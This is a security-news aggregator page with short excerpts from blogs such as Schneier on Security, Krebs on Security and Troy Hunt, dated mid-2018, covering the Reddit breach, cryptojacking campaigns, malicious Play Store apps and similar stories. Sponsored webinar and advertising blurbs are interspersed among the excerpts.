Schneier on Security
JULY 30, 2018
Interesting research: " You are your Metadata: Identification and Obfuscation of Social Media Users using Metadata Information ," by Beatrice Perez, Mirco Musolesi, and Gianluca Stringhini. Abstract: Metadata are associated to most of the information we produce in our daily interactions and communication in the digital world. Yet, surprisingly, metadata are often still categorized as non-sensitive.
The Last Watchdog
JULY 30, 2018
One sliver of the $90 billion, or so, companies are expected to spend this year on cybersecurity products and services is an estimated $85 million they will shell out for encrypted flash drives. One of more fascinating innovators in this space is 11-year-old DataLocker, based in Overland Park, Kansas. Related: How DataLocker got its start h. Co-founder Jay took a business trip to South Korea in the fall of 2007.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.
Krebs on Security
AUGUST 1, 2018
Reddit.com today disclosed that a data breach exposed some internal data, as well as email addresses and passwords for some Reddit users. As Web site breaches go, this one doesn’t seem too severe. What’s interesting about the incident is that it showcases once again why relying on mobile text messages (SMS) for two-factor authentication (2FA) can lull companies and end users into a false sense of security.
Troy Hunt
JULY 31, 2018
So that little project Scott Helme and I took on - WhyNoHTTPS.com - seems to have garnered quite a bit of attention. We had about 81k visitors drop by on the first day and for the most part, the feedback has been overwhelmingly positive. Most people have said it's great to have the data surfaced publicly and they've used that list to put some pressure on sites to up their game.
Advertisement
How many people would you trust with your house keys? Chances are, you have a handful of trusted friends and family members who have an emergency copy, but you definitely wouldn’t hand those out too freely. You have stuff that’s worth protecting—and the more people that have access to your belongings, the higher the odds that something will go missing.
Schneier on Security
AUGUST 3, 2018
Humble Bundle sells groups of e-books at ridiculously low prices, DRM free. This month , the bundles are all Wiley titles, including three of my books: Applied Cryptography , Secrets and Lies , and Cryptography Engineering. $15 gets you everything, and they're all DRM-free. Even better, a portion of the proceeds goes to the EFF. As a board member, I've seen the other side of this.
The Last Watchdog
AUGUST 3, 2018
Illicit crypto mining is advancing apace. It was easy to see this coming. It began when threat actors began stealthily embedding crypto mining functionality into the web browsers of unwitting individuals. Cryptojacking was born. And now, the next-level shift is underway. Related article: Illicit crypto mining hits cloud services. Cybercriminals have shifted their focus to burrowing onto company servers and then redirecting those corporate computing resources to crypto mining chores.
Cyber Security Informer brings together the best content for cyber security professionals from the widest variety of industry thought leaders.
Troy Hunt
AUGUST 2, 2018
It's the coffee-machine weekly update! A slight change of scenery but other than that, it's business as usual. I'm going to keep this intro super-brief because it's very near beer o'clock and I have a very important task to go and take care of: BBQ time ?? pic.twitter.com/yq5hXOGABt — Troy Hunt (@troyhunt) August 3, 2018. References. Fashion Nexus suffered a data breach ("Is there an official statement?
Schneier on Security
AUGUST 1, 2018
The UK's GCHQ delivers a brutally blunt assessment of quantum key distribution: QKD protocols address only the problem of agreeing keys for encrypting data. Ubiquitous on-demand modern services (such as verifying identities and data integrity, establishing network sessions, providing access control, and automatic software updates) rely more on authentication and integrity mechanisms -- such as digital signatures -- than on encryption.
The Last Watchdog
AUGUST 2, 2018
The targeting of Sen. Claire McCaskill by Russian intelligency agency hackers, as she runs for re-election, underscores the need for each individual and organization to take online privacy and security as a core part of our everyday lives. Related: Using ‘gamification’ for security training. The National Cyber Security Alliance is a non-profit group, underwritten by the top tech companies and biggest banks, that has been out there since 2001 promoting best practices and supplying pr
Adam Levin
AUGUST 3, 2018
One of the world’s largest websites has announced a security compromise. Reddit, the self-proclaimed “front page of the Internet,” announced a security breach that occurred over a three-day period in June. What Happened. The hacker or hackers bypassed the site’s 2-Factor Authentication associated with several employees credentialed to access sensitive data and used that access to take email addresses, server logs, and a decade-old database containing logins and passwords.
Advertiser: Revenera
In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.
Adam Shostack
JULY 31, 2018
I’m honored to have my threat modeling book on this short list with Daniel Kahneman, Tony Hsieh, Nicole Forsgren, and Tom DeMarco: “ Summer Reading List: Top Recommendations from our Engineers.
Schneier on Security
AUGUST 1, 2018
We don't know if this is error or deliberate action, but five backdoors have been discovered already this year.
The Last Watchdog
JULY 30, 2018
Understanding today’s cybersecurity landscape is complex. The amount of threats aimed at enterprises is staggering. More than 230,000 new malware samples are launched every day. The average small and medium-size business experiences a cyber attack 44 times every day. And the cost of damage directly related to cybercrime is adding up, expected to reach $6 trillion by 2021.
Dark Reading
JULY 31, 2018
The second installment in a series highlighting women who are driving change in cybersecurity but may not be on your radar - yet.
Advertisement
The healthcare industry has massively adopted web tracking tools, including pixels and trackers. Tracking tools on user-authenticated and unauthenticated web pages can access personal health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other info provided by users on pages and thus can violate HIPAA Rules that govern the Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates.
Adam Shostack
JULY 30, 2018
Cybersecurity 2.0 is a new promo from Humble Bundle. Nearly $800 worth of books, including my Threat Modeling, Schneier’s Secrets and Lies, and a whole lot more!
Schneier on Security
JULY 30, 2018
Good policy paper (summary here ) on the threats, current state, and potential policy solutions for the poor security of US space systems.
WIRED Threat Level
JULY 29, 2018
Inside Cloudflare's San Francisco office, 100 units of Edward Craven Walker’s groovy hardware help guard the internet.
Thales Cloud Protection & Licensing
AUGUST 2, 2018
This article was originally featured as a guest post on Venafi’s blog. Thales eSecurity and Venafi are technology partners. One of the biggest threat to machine identities today is the integrity of the software that runs within them, and that dictates their programed function. Whereas many machines worked independently in the past, the availability of ubiquitous communications is making it possible for networks of machines – including sensors, cloud applications, and distributed controls &
Speaker: Blackberry, OSS Consultants, & Revenera
Software is complex, which makes threats to the software supply chain more real every day. 64% of organizations have been impacted by a software supply chain attack and 60% of data breaches are due to unpatched software vulnerabilities. In the U.S. alone, cyber losses totaled $10.3 billion in 2022. All of these stats beg the question, “Do you know what’s in your software?
Security Affairs
AUGUST 3, 2018
Experts uncovered a massive cryptojacking campaign that is targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic. Security experts have uncovered a massive cryptojacking campaign that is targeting MikroTik routers, the hackers aim to change the configuration of the devices to inject a Coinhive cryptocurrency mining script in the users’ web traffic.
Schneier on Security
JULY 31, 2018
The Diqee 360 robotic vacuum cleaner can be turned into a surveillance device. The attack requires physical access to the device, so in the scheme of things it's not a big deal. But why in the world is the vacuum equipped with a microphone?
WIRED Threat Level
AUGUST 1, 2018
The Justice Department announced the arrest of three members of notorious cybercrime group Fin7—and detailed some of their methods in the process.
Privacy and Cybersecurity Law
AUGUST 1, 2018
The Information Commissioner’s Office have released their Annual Report for 2018. This blog summarises the key messages. Information Commissioner’s Thoughts […].
Advertisement
Within the past few years, ransomware attacks have turned to critical infrastructure, healthcare, and government entities. Attackers have taken advantage of the rapid shift to remote work and new technologies. Add to that hacktivism due to global conflicts and U.S. elections, and an increased focus on AI, and you have the perfect recipe for a knotty and turbulent 2024.
Security Affairs
AUGUST 1, 2018
Google recently removed 145 applications from the official Google Play store because they were found to carry malicious Windows executables inside. Researchers from Palo Alto Networks revealed that Google removed more than 145 apps from the Play store because they were carrying a Windows malware, The apps were uploaded to the Google Play store between October and November 2017, this means that for months Android users were exposed to the attack.
Schneier on Security
AUGUST 2, 2018
Evidence that stolen credit cards are being used to purchase items in games like Clash of Clans, which are then resold for cash.
Thales Cloud Protection & Licensing
JULY 31, 2018
The newest CipherTrust Cloud Key Manager capability. CipherTrust Cloud Key Manager is a multi-cloud encryption key management solution ideal for customers using Microsoft Azure Key Vault , Amazon Web Services Key Management Service , Microsoft Office365 or Salesforce Shield Platform Encryption. Before I talk about the importance of the newest feature of Cipher Trust Key Manager let’s define some terms to get everyone thinking similarly about keys and key management.
WIRED Threat Level
JULY 31, 2018
After five years, US lawmakers and law enforcement are starting to fight back against 3-D printed firearms and "ghost guns.".
Speaker: Erika R. Bales, Esq.
When we talk about “compliance and security," most companies want to ensure that steps are being taken to protect what they value most – people, data, real or personal property, intellectual property, digital assets, or any other number of other things - and it’s more important than ever that safeguards are in place. Let’s step back and focus on the idea that no matter how complicated the compliance and security regime, it should be able to be distilled down to a checklist.
Dark Reading
AUGUST 1, 2018
An attacker broke into Reddit systems and accessed user data, email addresses, and a database of hashed passwords from 2007.
Schneier on Security
AUGUST 3, 2018
Interesting commentary : The military is an impossible place for hackers thanks to antiquated career management, forced time away from technical positions, lack of mission, non-technical mid- and senior-level leadership, and staggering pay gaps, among other issues. It is possible the military needs a cyber corps in the future, but by accelerating promotions, offering graduate school to newly commissioned officers, easing limited lateral entry for exceptional private-sector talent, and shortening
Security Affairs
AUGUST 1, 2018
Reddit Warns Users of Data Breach. Reddit is warning its users of a security breach, an attacker broke into the systems of the platform and accessed user data. Reddit is warning its users of a security breach, a hacker broke into the systems of the platform and accessed user data. The hacker accessed user data, email addresses, and a 2007 backup database containing hashed passwords managed by the platform.
WIRED Threat Level
JULY 31, 2018
The company removed 32 pages and accounts from Facebook and Instagram for “coordinated inauthentic behavior.”.
Speaker: William Hord, Vice President of ERM Services
A well-defined change management process is critical to minimizing the impact that change has on your organization. Leveraging the data that your ERM program already contains is an effective way to help create and manage the overall change management process within your organization. Your ERM program generally assesses and maintains detailed information related to strategy, operations, and the remediation plans needed to mitigate the impact on the organization.
Expert insights. Personalized for you.
235 
Let's personalize your content